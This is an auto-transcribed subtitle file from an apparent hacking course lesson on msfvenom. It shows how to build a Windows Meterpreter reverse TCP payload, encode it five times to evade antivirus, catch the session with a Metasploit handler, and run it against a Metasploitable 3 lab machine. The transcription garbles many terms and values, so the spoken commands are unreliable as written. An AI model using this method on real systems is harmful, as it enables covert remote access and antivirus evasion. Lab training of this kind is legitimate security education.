1 00:00:00,650 --> 00:00:04,820 So I showed you earlier in the fourth section about encoders. 2 00:00:05,750 --> 00:00:15,350 MSRA Venom uses these encoders to keep you hidden from antivirus offers, encoders alter the code in 3 00:00:15,350 --> 00:00:18,800 an executable so that it looks different to anti viruses. 4 00:00:20,000 --> 00:00:28,460 They encode the original executable in a new binary so that when the executable is run, the original 5 00:00:28,460 --> 00:00:31,460 code is decoded into memory and executed. 6 00:00:33,120 --> 00:00:36,300 Now, different encoders are used for different platforms. 7 00:00:37,630 --> 00:00:42,650 MSRA venom also has an option to iterate the encoding process. 8 00:00:43,420 --> 00:00:46,600 So what I mean by that is it allows for multi encoding. 9 00:00:47,440 --> 00:00:48,610 I'll show you by example. 10 00:00:50,140 --> 00:00:58,360 So to create an encoded payload, you're going to need to specify with the E parameter and then to iterate 11 00:00:58,360 --> 00:01:02,600 the encoding for several times, use the eye parameter. 12 00:01:03,460 --> 00:01:05,410 So it is very easy to use a payload. 13 00:01:06,380 --> 00:01:12,110 Now, the only thing that I want you to know is the encoder name and if it's suitable for your needs, 14 00:01:12,650 --> 00:01:17,030 so let's generate a file that contains an encoded payload. 15 00:01:17,920 --> 00:01:21,220 MSF venom p windows. 16 00:01:22,620 --> 00:01:23,550 My interpreter. 17 00:01:25,380 --> 00:01:26,940 Reverse TCP. 18 00:01:28,490 --> 00:01:37,640 Almost equals tend tend to one one and Albert equals four for four to. 19 00:01:38,570 --> 00:01:40,070 And the platform is Windows. 20 00:01:42,360 --> 00:01:44,280 Architecture is 32 bit. 21 00:01:45,910 --> 00:01:47,740 File type is a Windows executable. 22 00:01:49,450 --> 00:01:55,990 And then he is in codename X Eighty-six Forward Slash. 23 00:01:56,850 --> 00:02:09,390 As age, I KTXA underscore, geet underscore and ay ay ay five to iterate the encoding five times. 24 00:02:10,690 --> 00:02:13,530 And then let's give a name to the output file. 25 00:02:15,110 --> 00:02:20,870 So here we're going to need to be careful that we use a suitable encoder for the other parameters, 26 00:02:20,870 --> 00:02:22,640 such as architecture. 27 00:02:23,480 --> 00:02:23,900 All right. 28 00:02:23,900 --> 00:02:28,250 So now that file is created and saved unless. 29 00:02:29,700 --> 00:02:36,030 And look, there it is, the the file is a 32 bit Windows executable. 30 00:02:37,700 --> 00:02:45,320 So now we're going to need a handler, so open MSF console and I'm already using the handler template, 31 00:02:46,070 --> 00:02:47,870 so let's see some options. 32 00:02:49,400 --> 00:02:51,500 All right, so now I'm going to need to change everything. 33 00:02:52,490 --> 00:03:04,370 So set payload to Windows interpreter reverse tcp sattell host to tend tend to dot one one set outport 34 00:03:04,370 --> 00:03:08,660 to four four four two and I think to set. 35 00:03:09,660 --> 00:03:15,780 So the options again and everything looks fine now that exploit Jay. 36 00:03:17,790 --> 00:03:19,500 The pythons, however, are still running. 37 00:03:20,740 --> 00:03:22,750 So open Métis, voidable three. 38 00:03:24,030 --> 00:03:25,530 And refresh the page. 39 00:03:27,840 --> 00:03:32,100 Download and save and go to domestic file to the desktop. 40 00:03:34,390 --> 00:03:38,650 Now, let's open the MSF console to observe this session. 41 00:03:41,410 --> 00:03:45,880 And now let's run the encoded EXI by double clicking. 42 00:03:48,950 --> 00:03:55,400 And if you look over on to the left pane, you can see that the session has opened sessions. 43 00:03:56,710 --> 00:04:03,010 All right, so you got the session on board for four, for two, so now you can interact with session 44 00:04:03,010 --> 00:04:03,460 to. 45 00:04:04,930 --> 00:04:05,920 Get UID. 46 00:04:07,320 --> 00:04:08,100 Cesan for. 47 00:04:10,540 --> 00:04:12,760 And this is definitely Meadow's portable three.